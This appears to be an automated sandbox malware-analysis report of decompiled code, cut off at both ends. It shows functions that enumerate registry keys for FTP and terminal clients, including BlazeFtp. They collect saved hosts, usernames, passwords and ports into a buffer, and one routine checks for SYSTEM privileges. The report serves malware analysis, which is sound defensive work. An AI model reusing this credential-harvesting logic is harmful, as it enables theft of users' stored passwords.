                                                                        						E004017D5(_t63);
                                                                        						_v2068 = E00401C8E(_a4, _v2092, "HostName", 0);
                                                                        						_v2072 = E00401C8E(_a4, _v2092, "UserName", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2092, "Password", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2092, "PortNumber",  &_v2088);
                                                                        						_v2084 = E00401C8E(_a4, _v2092, "TerminalType", 0);
                                                                        						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2068);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014BC(_a12, _v2080, _v2088);
                                                                        							E004014E8(_a12, _v2084);
                                                                        						}
                                                                        						E0040DA5F(_a4, _v2092, _a12);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t58;
                                                                        			}


                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DA72
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040DAA6
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DC3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                                        • API String ID: 1332880857-1017491782
                                                                        • Opcode ID: c22ab1647ba881019c642ce5e375ed652d00b9c8488e27d5bcc6e29b573895a8
                                                                        • Instruction ID: 74ed6bc0f2f1019c4438166421eefdcc1314a9bab96f8c2a3f024f8d1cd312b8
                                                                        • Opcode Fuzzy Hash: c22ab1647ba881019c642ce5e375ed652d00b9c8488e27d5bcc6e29b573895a8
                                                                        • Instruction Fuzzy Hash: 1F41B83194011CBBDF226F91CC42BDD7AB5BF04304F1080BAB545750B2DF7A9AA1AF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406FA8(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t56;
                                                                        				long _t57;
                                                                        
                                                                        				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t57 = _t56;
                                                                        				if(_t57 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t62);
                                                                        						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
                                                                        						_v2084 = E00401C8E(_a8, _v2068, "_Password", 0);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, "Server", 0);
                                                                        						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
                                                                        						_v2088 = E00401C8E(_a8, _v2068, "Directory", 0);
                                                                        						if(_v2080 != 0 || _v2084 != 0) {
                                                                        							if(_v2072 != 0 && _v2076 != 0) {
                                                                        								E00401486(_a4, 0xbeef0000);
                                                                        								E004014E8(_a4, _v2072);
                                                                        								E004014E8(_a4, _v2076);
                                                                        								E004014E8(_a4, _v2080);
                                                                        								E004014E8(_a4, _v2084);
                                                                        								E004014E8(_a4, _v2088);
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2088);
                                                                        						E00406FA8(_a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t57;
                                                                        			}


                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FBB
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406FEF
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407181
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Directory$Password$Server$UserName$_Password
                                                                        • API String ID: 1332880857-3317168126
                                                                        • Opcode ID: 42fbef6f6529482de62ebaa24f1facc4f4f3595325c7a0f14c9b057af7bdbd20
                                                                        • Instruction ID: 6887f4d4dc4833aea87068e0bfe498b125db7ab105371447aa8d5c49bdf339d4
                                                                        • Opcode Fuzzy Hash: 42fbef6f6529482de62ebaa24f1facc4f4f3595325c7a0f14c9b057af7bdbd20
                                                                        • Instruction Fuzzy Hash: BA41C33194011CBADF226F51CC42BDCBAB6BF04304F14C0BAB558751B1DB7A5AA2AF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406010(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2068, "Port", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_v2088 = E00401C8E( *0x4140fe, _v2068, "HostDirName", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        							E004014E8(_a4, _v2088);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2088);
                                                                        						E00406010(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406026
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040605A
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004061EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostDirName$HostName$Password$Port$Username
                                                                        • API String ID: 1332880857-791697221
                                                                        • Opcode ID: b4d8cf1640381694cc81f35b3c5a29c4504e5c6baacdd4194a686e989411f198
                                                                        • Instruction ID: 661ca5f8eecc736091142f07f5f5879c64b4d0dd11ba7ceb6d40fcb3e2135ea1
                                                                        • Opcode Fuzzy Hash: b4d8cf1640381694cc81f35b3c5a29c4504e5c6baacdd4194a686e989411f198
                                                                        • Instruction Fuzzy Hash: 0D41B53194011CAADF226F92CC42BDC7AB9BF44704F10C0BAB545750B1DB7A5EA2AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040D625(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				intOrPtr _v2088;
                                                                        				long _t46;
                                                                        				long _t47;
                                                                        
                                                                        				_t46 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t47 = _t46;
                                                                        				if(_t47 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2088 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t52);
                                                                        						_v2068 = E00401C8E( *0x4140fe, _v2088, "Host", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2088, "User", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2088, "Pass", 0);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2088, "Port", 0);
                                                                        						_v2084 = E00401C8E( *0x4140fe, _v2088, "Remote Dir", 0);
                                                                        						if(_v2072 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2068);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E004014E8(_a4, _v2084);
                                                                        						}
                                                                        						E0040D625(_a4, _v2088);
                                                                        						E004017D5(_v2088);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t47;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D63B
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040D66F
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D7F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: Host$Pass$Port$Remote Dir$User
                                                                        • API String ID: 1332880857-1775099961
                                                                        • Opcode ID: 028aa4547a8f975e74787c54352b77b1a4b0608344862c9357c73e981692f7de
                                                                        • Instruction ID: fa02369c385350f7445e4dbac51c9b2e56b62a742fd5d540ae24488e7f34cbe6
                                                                        • Opcode Fuzzy Hash: 028aa4547a8f975e74787c54352b77b1a4b0608344862c9357c73e981692f7de
                                                                        • Instruction Fuzzy Hash: 7241A931940118BBDF216FA2CD42BDC7AB6BF08704F14C0B6B648754B1DA7A5E91AFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 51%
                                                                        			E00402B27(void* __eax, void* __edx) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				CHAR* _v20;
                                                                        				void* _t21;
                                                                        				int _t26;
                                                                        				int _t32;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        
                                                                        				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
                                                                        					_t42 = 0;
                                                                        					_t21 = GetCurrentProcess();
                                                                        					_push( &_v8);
                                                                        					_push(8);
                                                                        					_push(_t21);
                                                                        					if( *0x41440d() != 0) {
                                                                        						_v12 = 0;
                                                                        						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                                                                        						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
                                                                        							_v16 = E004017EC(_v12);
                                                                        							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
                                                                        							if(_t32 != 0) {
                                                                        								_push( &_v20);
                                                                        								_push( *_v16);
                                                                        								if( *0x414419() != 0) {
                                                                        									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
                                                                        									if(_t39 == 0) {
                                                                        										_t42 = 1;
                                                                        									}
                                                                        									LocalFree(_v20);
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v16);
                                                                        						}
                                                                        						CloseHandle(_v8);
                                                                        					}
                                                                        					return _t42;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 00402B56
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001,00000000,00000000,00000000), ref: 00402B84
                                                                        • GetLastError.KERNEL32 ref: 00402B8E
                                                                        • GetTokenInformation.KERNELBASE(00410B87,00000001,?,00000000,00000000,00000000), ref: 00402BB8
                                                                        • lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
                                                                        • LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
                                                                        • CloseHandle.KERNEL32(00410B87), ref: 00402BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InformationToken$CloseCurrentErrorFreeHandleLastLocalProcesslstrcmp
                                                                        • String ID: S-1-5-18
                                                                        • API String ID: 887674703-4289277601
                                                                        • Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
                                                                        • Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
                                                                        • Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040C888(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t49;
                                                                        				intOrPtr _t53;
                                                                        				void* _t58;
                                                                        				char* _t59;
                                                                        
                                                                        				_t58 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x3f, 0);
                                                                        				_t59 =  *0x414082; // 0x0
                                                                        				if( *_t59 == 0) {
                                                                        					L5:
                                                                        					E0040417C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
                                                                        					_t34 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
                                                                        					_v24 = _t34;
                                                                        					_v16 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
                                                                        					_v20 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
                                                                        					_v28 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
                                                                        					if(_v16 != 0 && _v20 != 0) {
                                                                        						_t66 = _v24;
                                                                        						if(_v24 != 0) {
                                                                        							E00401486(_a4, 0xbeef0001);
                                                                        							E004014E8(_a4, _v16);
                                                                        							E004014E8(_a4, _v20);
                                                                        							E004014E8(_a4, _v24);
                                                                        							E004014BC(_a4, _v28, _v32);
                                                                        						}
                                                                        					}
                                                                        					E004017D5(_v24);
                                                                        					E004017D5(_v16);
                                                                        					E004017D5(_v20);
                                                                        					E004017D5(_v28);
                                                                        					return E00401553(_t58, _t66, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t49 = StrStrIA(_t59, "BlazeFtp");
                                                                        					_t61 = _t49;
                                                                        					if(_t49 != 0) {
                                                                        						_t53 = E0040234A(_t61, _t59);
                                                                        						if(_t53 != 0) {
                                                                        							_v12 = _t53;
                                                                        							E00404131(_a4, _v12, "site.dat", 0xbeef0000);
                                                                        							E004017D5(_v12);
                                                                        						}
                                                                        					}
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        				} while ( *_t59 != 0);
                                                                        				goto L5;
                                                                        			}
















                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,BlazeFtp), ref: 0040C8AF
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                                        • API String ID: 1884169789-2976447346
                                                                        • Opcode ID: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
                                                                        • Instruction ID: 3013046b71ecd8600bd216ab05a28f2b20a5d622d3359bada96b4353b2a25071
                                                                        • Opcode Fuzzy Hash: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
                                                                        • Instruction Fuzzy Hash: 55310B71940209FADF126BA2CC86FEE7E72AB84714F20813BB510751F1D7794A919B9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406B7B(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				char _v2092;
                                                                        				long _t48;
                                                                        				long _t49;
                                                                        				intOrPtr* _t64;
                                                                        
                                                                        				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t49 = _t48;
                                                                        				if(_t49 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t54);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2092);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Hostname", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2088);
                                                                        						if(_t64 == 0 || _v2088 != 4) {
                                                                        							_t65 = _t64;
                                                                        							if(_t64 != 0) {
                                                                        								E004017D5(_t65);
                                                                        							}
                                                                        							_v2084 = 0x15;
                                                                        						} else {
                                                                        							 *_t22 =  *_t64;
                                                                        							E004017D5(_t64);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004041BC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014BC(_a4, _v2080, _v2092);
                                                                        							E00401486(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t49;
                                                                        			}


















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B91
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406BC5
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D66
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: Hostname$Password$Port$Username
                                                                        • API String ID: 3369285772-1811172798
                                                                        • Opcode ID: 0b85c52166b349b0786779c279ec2d2bb21994fb8f438e0d5b86aa49b75ec8c5
                                                                        • Instruction ID: d58266f3bc7653ca31e84fadb1e2cf46137222864ef5a9eb4340578e60140e29
                                                                        • Opcode Fuzzy Hash: 0b85c52166b349b0786779c279ec2d2bb21994fb8f438e0d5b86aa49b75ec8c5
                                                                        • Instruction Fuzzy Hash: 7341F67194011CEAEF216F52CC42BDD7AB9BF08304F14C0BAB145750B1EE795EA19F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406947(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				long _t43;
                                                                        				long _t44;
                                                                        				intOrPtr* _t58;
                                                                        
                                                                        				_t43 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t44 = _t43;
                                                                        				if(_t44 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t49);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "Server", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
                                                                        						_t58 = E00401C8E( *0x4140fe, _v2068, "FtpPort",  &_v2088);
                                                                        						if(_t58 == 0 || _v2088 != 4) {
                                                                        							_t59 = _t58;
                                                                        							if(_t58 != 0) {
                                                                        								E004017D5(_t59);
                                                                        							}
                                                                        							_v2084 = 0x15;
                                                                        						} else {
                                                                        							 *_t21 =  *_t58;
                                                                        							E004017D5(_t58);
                                                                        						}
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        							E00401486(_a4, _v2084);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t44;
                                                                        			}

















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040695D
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00406991
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B06
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseEnumFreeLocalOpen
                                                                        • String ID: FtpPort$Password$Server$Username
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E29C(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				unsigned int _v32;
                                                                        				long _t50;
                                                                        				long _t51;
                                                                        
                                                                        				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t51 = _t50;
                                                                        				if(_t51 != 0) {
                                                                        					return _t51;
                                                                        				}
                                                                        				_v12 = E00401C8E(_a4, _a8, "Site", 0);
                                                                        				_v16 = E00401C8E(_a4, _a8, "UserID", 0);
                                                                        				_v20 = E00401C8E(_a4, _a8, "xflags",  &_v32);
                                                                        				_v24 = E00401C8E(_a4, _a8, "Port", 0);
                                                                        				_v28 = E00401C8E(_a4, _a8, "Folder", 0);
                                                                        				if(_v20 != 0 && _v32 != 0 && E00402A3B(_v20, _v32) != 0) {
                                                                        					_v32 = _v32 >> 1;
                                                                        					if(E004041BC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
                                                                        						E00401486(_a12, 0xbeef0000);
                                                                        						E004014E8(_a12, _v12);
                                                                        						E004014E8(_a12, _v16);
                                                                        						E004014BC(_a12, _v20, _v32);
                                                                        						E004014E8(_a12, _v24);
                                                                        						E004014E8(_a12, _v28);
                                                                        					}
                                                                        				}
                                                                        				E004017D5(_v12);
                                                                        				E004017D5(_v16);
                                                                        				E004017D5(_v20);
                                                                        				E004017D5(_v24);
                                                                        				E004017D5(_v28);
                                                                        				return RegCloseKey(_v8);
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E2AC
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E3DC
                                                                          • Part of subcall function 004041BC: LocalFree.KERNEL32(00000000), ref: 0040423C
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseFreeLocalOpenlstrlen
                                                                        • String ID: Folder$Port$Site$UserID$xflags
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004076F4(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t39;
                                                                        				long _t40;
                                                                        
                                                                        				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t40 = _t39;
                                                                        				if(_t40 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t45);
